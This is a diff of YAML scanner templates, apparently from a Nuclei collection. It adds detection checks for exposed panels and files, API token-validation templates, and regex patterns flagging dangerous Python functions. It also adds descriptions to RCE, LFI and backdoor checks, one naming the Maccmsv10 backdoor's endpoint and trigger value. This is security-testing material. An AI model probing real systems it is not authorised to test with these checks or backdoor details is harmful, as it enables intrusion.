|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -10,14 +10,18 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi"
|
- "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi"
|
||||||
|
- "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi"
|
||||||
|
- "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "/dana-na/auth/welcome.cgi"
|
- "/dana-na/auth/welcome.cgi"
|
||||||
part: header
|
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css"
|
- "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css"
|
||||||
part: body
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: redis-commander-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Redis Commander Exposure
|
||||||
|
author: dahse89
|
||||||
|
severity: low
|
||||||
|
reference:
|
||||||
|
- https://joeferner.github.io/redis-commander/
|
||||||
|
- https://github.com/joeferner/redis-commander
|
||||||
|
tags: panel,redis
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- "<title>Redis Commander"
|
||||||
|
- "redisCommanderBearerToken"
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: securityspy-detect
|
||||||
|
info:
|
||||||
|
name: SecuritySpy Camera Detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
metadata:
|
||||||
|
shodan-dork: 'title:SecuritySpy'
|
||||||
|
tags: unauth,iot,securityspy,panel,camera
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>SecuritySpy</title>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: sugarcrm-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Detect SugarCRM Panel
|
||||||
|
author: johnk3r
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=sugarcrm
|
||||||
|
tags: sugarcrm,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
- "{{BaseURL}}/index.php?action=Login&module=Users"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>SugarCRM</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: dwsync-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Dwsync.xml Exposure
|
||||||
|
author: KaizenSecurity
|
||||||
|
severity: info
|
||||||
|
description: The dwsync.xml file is a file generated by Dreamweaver. Where the file contains information related to what files are in the website directory.
|
||||||
|
tags: dwsync,exposure,dreamweaver
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/_notes/dwsync.xml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- application/xml
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<dwsync>'
|
||||||
|
- '</dwsync>'
|
||||||
|
condition: and
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: idea-folder-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Public .idea Folder containing files with sensitive data
|
||||||
|
author: martincodes-de
|
||||||
|
severity: info
|
||||||
|
description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data.
|
||||||
|
tags: phpstorm,jetbrains,idea,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.idea/deployment.xml"
|
||||||
|
- "{{BaseURL}}/.idea/workspace.xml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<?xml version="
|
||||||
|
- "<project version"
|
||||||
|
part: body
|
||||||
|
condition: and
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: idea-logs-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Public .idea Folder containing http logs
|
||||||
|
author: martincodes-de
|
||||||
|
severity: info
|
||||||
|
description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file
|
||||||
|
tags: phpstorm,jetbrains,idea,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.idea/httpRequests/http-requests-log.http"
|
||||||
|
- "{{BaseURL}}/.idea/httpRequests/http-client.cookies"
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^(GET|POST) https?:\/\/'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "# domain path name value date"
|
||||||
|
part: body
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: python-scanner
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Python Scanner
|
||||||
|
author: majidmc2
|
||||||
|
severity: info
|
||||||
|
description: Indicators for dangerous Python functions
|
||||||
|
reference:
|
||||||
|
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
|
||||||
|
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
|
||||||
|
tags: python,file,sast
|
||||||
|
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- py
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: code-injection
|
||||||
|
regex:
|
||||||
|
- 'exec'
|
||||||
|
- 'eval'
|
||||||
|
- '__import__'
|
||||||
|
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: command-injection
|
||||||
|
regex:
|
||||||
|
- 'subprocess.call\(.*shell=True.*\)'
|
||||||
|
- 'os.system'
|
||||||
|
- 'os.popen'
|
||||||
|
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: untrusted-source
|
||||||
|
regex:
|
||||||
|
- 'pickle.loads'
|
||||||
|
- 'cPickle.loads'
|
||||||
|
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: dangerous-yaml
|
||||||
|
regex:
|
||||||
|
- 'yaml.load'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: sqli
|
||||||
|
regex:
|
||||||
|
- 'cursor.execute'
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: Cristi vlad (@cristivlad25)
|
author: Cristi vlad (@cristivlad25)
|
||||||
severity: info
|
severity: info
|
||||||
description: Finds Application YAML files which often contain sensitive information.
|
description: Finds Application YAML files which often contain sensitive information.
|
||||||
|
tags: misconfig
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: wix-takeover
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: harshinsecurity,philippedelteil
|
||||||
|
description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over.
|
||||||
|
severity: high
|
||||||
|
tags: takeover,wix
|
||||||
|
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
condition: or
|
||||||
|
words:
|
||||||
|
- 'Error ConnectYourDomain occurred'
|
||||||
|
- 'wixErrorPagesApp'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 404
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: aws-cloudfront-service
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: AWS Cloudfront service detection
|
||||||
|
author: jiheon-dev
|
||||||
|
severity: info
|
||||||
|
tags: aws,tech
|
||||||
|
description: Detect websites using AWS cloudfront service
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
condition: or
|
||||||
|
dsl:
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: hit from cloudfront')"
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')"
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: miss from cloudfront')"
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: error from cloudfront')"
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: hikvision-detection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hikvision Detection
|
||||||
|
author: pdteam
|
||||||
|
severity: info
|
||||||
|
tags: tech,hikvision
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/favicon.ico"
|
||||||
|
- "{{BaseURL}}/doc/page/login.asp"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Hikvision Digital Technology"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
name: favicon
|
||||||
|
dsl:
|
||||||
|
- "status_code==200 && ('999357577' == mmh3(base64_py(body)))"
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: ibm-sterling-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IBM Sterling File Gateway Detect
|
||||||
|
author: princechaddha
|
||||||
|
severity: info
|
||||||
|
tags: tech,sterling,ibm
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Welcome to IBM Sterling File Gateway"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-adafruit-io
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adafruit IO API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://io.adafruit.com/api/docs/
|
||||||
|
tags: token-spray,adafruit
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://io.adafruit.com/api/v2/user"
|
||||||
|
headers:
|
||||||
|
X-AIO-Key: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "error"
|
||||||
|
negative: true
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: api-appveyor
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: AppVeyor API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://www.appveyor.com/docs/api/
|
||||||
|
tags: token-spray,appveyor
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://ci.appveyor.com/api/roles"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Authorization required"
|
||||||
|
negative: true
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: api-binance
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Binance REST API
|
||||||
|
author: geeknik
|
||||||
|
severity: info
|
||||||
|
reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md
|
||||||
|
tags: token-spray,binance
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.binance.com/api/v3/historicalTrades"
|
||||||
|
headers:
|
||||||
|
X-MBX-APIKEY: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Invalid API-key"
|
||||||
|
- "key format invalid"
|
||||||
|
condition: or
|
||||||
|
negative: true
|
|
@ -0,0 +1,19 @@
|
||||||
|
id: api-cooperhewitt
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cooper Hewitt API
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference: https://collection.cooperhewitt.org/api/methods/
|
||||||
|
tags: token-spray,cooperhewitt
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: api-dbt
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: dbt Cloud API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://docs.getdbt.com/docs/introduction
|
||||||
|
tags: token-spray,dbt
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://cloud.getdbt.com/api/v2/accounts/"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json
|
||||||
|
Authorization: Token {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Invalid token"
|
||||||
|
- "Authentication credentials were not provided."
|
||||||
|
condition: or
|
||||||
|
negative: true
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: api-leanix
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LeanIX API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://docs.leanix.net/docs/rest-api
|
||||||
|
tags: token-spray,leanix
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://us.leanix.net/services/integration-api/v1/examples/starterExample"
|
||||||
|
- "https://eu.leanix.net/services/integration-api/v1/examples/starterExample"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Credentials are required"
|
||||||
|
negative: true
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-strava
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Strava API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
reference: https://developers.strava.com/docs/getting-started/
|
||||||
|
severity: info
|
||||||
|
tags: token-spray,strava
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://www.strava.com/api/v3/athlete"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Authorization Error"
|
||||||
|
negative: true
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-taiga
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Taiga API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
reference: https://docs.taiga.io/api.html
|
||||||
|
severity: info
|
||||||
|
tags: token-spray,taiga
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.taiga.io/api/v1/application-tokens"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "token_not_valid"
|
||||||
|
negative: true
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: api-thecatapi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TheCatApi API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference: https://docs.thecatapi.com/
|
||||||
|
tags: token-spray,thecatapi
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.thecatapi.com/v1/votes"
|
||||||
|
headers:
|
||||||
|
x-api-key: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
negative: true
|
||||||
|
status:
|
||||||
|
- 401
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-webex
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco Webex API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://developer.webex.com/docs/getting-started
|
||||||
|
tags: token-spray,cisco,webex
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://webexapis.com/v1/rooms"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "errors"
|
||||||
|
negative: true
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Seeyon WooYun LFR
|
name: Seeyon WooYun LFR
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker.
|
||||||
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
|
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
|
||||||
tags: seeyon,wooyun,lfi
|
tags: seeyon,wooyun,lfi
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Maccmsv10 Backdoor
|
name: Maccmsv10 Backdoor
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'.
|
||||||
tags: maccmsv10,rce
|
tags: maccmsv10,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://paper.seebug.org/676/
|
reference: https://paper.seebug.org/676/
|
||||||
|
description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content.
|
||||||
tags: metinfo,lfi
|
tags: metinfo,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: OpenSNS Remote Code Execution Vulnerability
|
name: OpenSNS Remote Code Execution Vulnerability
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.
|
||||||
reference:
|
reference:
|
||||||
- http://www.0dayhack.net/index.php/2417/
|
- http://www.0dayhack.net/index.php/2417/
|
||||||
- https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
|
- https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
|
||||||
|
|
|
@ -3,6 +3,7 @@ id: php-zerodium-backdoor-rce
|
||||||
info:
|
info:
|
||||||
name: PHP Zerodium Backdoor RCE
|
name: PHP Zerodium Backdoor RCE
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
|
description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
|
||||||
reference: https://news-web.php.net/php.internals/113838
|
reference: https://news-web.php.net/php.internals/113838
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: php,backdoor
|
tags: php,backdoor
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: ProcessMaker <= 3.5.4 Directory Traversal
|
name: ProcessMaker <= 3.5.4 Directory Traversal
|
||||||
author: KrE80r
|
author: KrE80r
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/50229
|
- https://www.exploit-db.com/exploits/50229
|
||||||
- https://www.processmaker.com
|
- https://www.processmaker.com
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
tags: rconfig,rce
|
tags: rconfig,rce
|
||||||
|
description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
|
||||||
reference:
|
reference:
|
||||||
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
|
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
|
||||||
- https://www.exploit-db.com/exploits/48878
|
- https://www.exploit-db.com/exploits/48878
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: RockMongo V1.1.8 XSS
|
name: RockMongo V1.1.8 XSS
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application.
|
||||||
reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
|
reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
|
||||||
tags: rockmongo,xss
|
tags: rockmongo,xss
|
||||||
|
|
||||||
|
|
|
@ -4,8 +4,9 @@ info:
|
||||||
name: Ruijie EG cli.php RCE
|
name: Ruijie EG cli.php RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
|
||||||
reference:
|
reference:
|
||||||
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
|
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
||||||
- https://www.ruijienetworks.com
|
- https://www.ruijienetworks.com
|
||||||
tags: ruijie,rce
|
tags: ruijie,rce
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
|
name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
|
||||||
reference: https://exploit-db.com/exploits/48755
|
reference: https://exploit-db.com/exploits/48755
|
||||||
tags: ruijie,lfi
|
tags: ruijie,lfi
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Sangfor EDR 3.2.17R1/3.2.21 RCE
|
name: Sangfor EDR 3.2.17R1/3.2.21 RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands.
|
||||||
reference: https://www.cnblogs.com/0day-li/p/13650452.html
|
reference: https://www.cnblogs.com/0day-li/p/13650452.html
|
||||||
tags: rce
|
tags: rce
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: SAP wide open redirect
|
name: SAP wide open redirect
|
||||||
author: Gal Nagli
|
author: Gal Nagli
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice.
|
||||||
tags: redirect,sap
|
tags: redirect,sap
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: SeaCMS V6.4.5 RCE
|
name: SeaCMS V6.4.5 RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
|
||||||
reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
|
reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
|
||||||
tags: seacms,rce
|
tags: seacms,rce
|
||||||
|
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Solar-Log 500 2.8.2 - Incorrect Access Control
|
name: Solar-Log 500 2.8.2 - Incorrect Access Control
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: high
|
severity: high
|
||||||
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
|
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
|
||||||
reference: https://www.exploit-db.com/exploits/49986
|
reference: https://www.exploit-db.com/exploits/49986
|
||||||
tags: solarlog,auth-bypass
|
tags: solarlog,auth-bypass
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Sonicwall SSLVPN ShellShock RCE
|
name: Sonicwall SSLVPN ShellShock RCE
|
||||||
author: PR3R00T
|
author: PR3R00T
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
|
||||||
reference:
|
reference:
|
||||||
- https://twitter.com/chybeta/status/1353974652540882944
|
- https://twitter.com/chybeta/status/1353974652540882944
|
||||||
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: TurboCRM XSS
|
name: TurboCRM XSS
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application.
|
||||||
reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
|
reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
|
||||||
tags: xss,turbocrm
|
tags: xss,turbocrm
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Twig PHP <2.4.4 template engine - SSTI
|
